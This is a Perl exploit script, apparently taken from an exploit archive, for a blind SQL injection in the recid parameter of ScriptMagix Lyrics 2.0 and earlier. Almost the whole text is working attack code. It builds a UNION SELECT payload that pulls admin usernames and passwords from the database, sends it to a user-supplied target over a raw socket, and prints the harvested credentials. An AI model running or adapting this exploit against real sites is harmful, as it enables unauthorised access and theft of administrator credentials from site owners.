ScriptMagix Lyrics <= 2.0 (index.php recid) SQL Injection Exploit

#!/usr/bin/perl #[Script&nbsp;Name:&nbsp;ScriptMagix&nbsp;Lyrics&nbsp;<=&nbsp;2.0&nbsp;(index.php&nbsp;recid)&nbsp;Remote&nbsp;Blind&nbsp;SQL&nbsp;Injection&nbsp;Exploit #[Coded&nbsp;by&nbsp;&nbsp;&nbsp;:&nbsp;ajann #[Author&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;ajann #[Contact&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;:( #[S.Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://www.scriptmagix.com #[$$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;35$ #[..&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;ajann,Turkey use&nbsp;IO::Socket; if(@ARGV&nbsp;<&nbsp;1){ print&nbsp;\" [======================================================================== [//&nbsp;&nbsp;&nbsp;ScriptMagix&nbsp;Lyrics&nbsp;<=&nbsp;2.0&nbsp;(index.php&nbsp;recid)&nbsp;Remote&nbsp;Blind&nbsp;SQL&nbsp;Injection&nbsp;Exploit [//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Usage:&nbsp;exploit.pl&nbsp;[target] [//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Example:&nbsp;exploit.pl&nbsp;victim.com [//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Example:&nbsp;exploit.pl&nbsp;victim.com [//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Vuln&Exp&nbsp;:&nbsp;ajann [======================================================================== \"; exit(); } #Local&nbsp;variables $server&nbsp;=&nbsp;$ARGV[0]; $server&nbsp;=~&nbsp;s/(http:\\/\\/)//eg; $host&nbsp;=&nbsp;\"http://\".$server; $port&nbsp;=&nbsp;\"80\"; $file&nbsp;=&nbsp;\"/index.php?cmd=6&recid=\"; print&nbsp;\"Script&nbsp;<DIR>&nbsp;:&nbsp;\"; $dir&nbsp;=&nbsp;<STDIN>; chop&nbsp;($dir); if&nbsp;($dir&nbsp;=~&nbsp;/exit/){ print&nbsp;\"--&nbsp;Exploit&nbsp;Failed[You&nbsp;Are&nbsp;Exited]&nbsp;\\n\"; exit(); } if&nbsp;($dir&nbsp;=~&nbsp;/\\//){} else&nbsp;{ print&nbsp;\"--&nbsp;Exploit&nbsp;Failed[No&nbsp;DIR]&nbsp;\\n\"; exit(); &nbsp;} $target&nbsp;=&nbsp;\"-1%20union%20select%200,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),0,0,0,0%20from%20admin/*\"; $target&nbsp;=&nbsp;$host.$dir.$file.$target; #Writing&nbsp;data&nbsp;to&nbsp;socket print&nbsp;\"+**********************************************************************+\\n\"; print&nbsp;\"+&nbsp;Trying&nbsp;to&nbsp;connect:&nbsp;$server\\n\"; $socket&nbsp;=&nbsp;IO::Socket::INET->new(Proto&nbsp;=>&nbsp;\"tcp\",&nbsp;PeerAddr&nbsp;=>&nbsp;\"$server\",&nbsp;PeerPort&nbsp;=>&nbsp;\"$port\")&nbsp;||&nbsp;die&nbsp;\"\\n+&nbsp;Connection&nbsp;failed...\\n\"; print&nbsp;$socket&nbsp;\"GET&nbsp;$target&nbsp;HTTP/1.1\\n\"; print&nbsp;$socket&nbsp;\"Host:&nbsp;$server\\n\"; print&nbsp;$socket&nbsp;\"Accept:&nbsp;*/*\\n\"; print&nbsp;$socket&nbsp;\"Connection:&nbsp;close\\n\\n\"; print&nbsp;\"+&nbsp;Connected!...\\n\"; #Getting while($answer&nbsp;=&nbsp;<$socket>)&nbsp;{ if&nbsp;($answer&nbsp;=~&nbsp;/username:(.*?)pass/){ print&nbsp;\"+&nbsp;Exploit&nbsp;succeed!&nbsp;Getting&nbsp;admin&nbsp;information.\\n\"; print&nbsp;\"+&nbsp;----------------&nbsp;+\\n\"; print&nbsp;\"+&nbsp;Username:&nbsp;$1\\n\"; } if&nbsp;($answer&nbsp;=~&nbsp;/password:(.*?)<br>/){ print&nbsp;\"+&nbsp;Password:&nbsp;$1\\n\"; } if&nbsp;($answer&nbsp;=~&nbsp;/Syntax&nbsp;error/)&nbsp;{&nbsp; print&nbsp;\"+&nbsp;Exploit&nbsp;Failed&nbsp;:&nbsp;(&nbsp;\\n\"; print&nbsp;\"+**********************************************************************+\\n\"; exit();&nbsp; } if&nbsp;($answer&nbsp;=~&nbsp;/Internal&nbsp;Server&nbsp;Error/)&nbsp;{ print&nbsp;\"+&nbsp;Exploit&nbsp;Failed&nbsp;:&nbsp;(&nbsp;&nbsp;\\n\"; print&nbsp;\"+**********************************************************************+\\n\"; exit();&nbsp; } &nbsp;}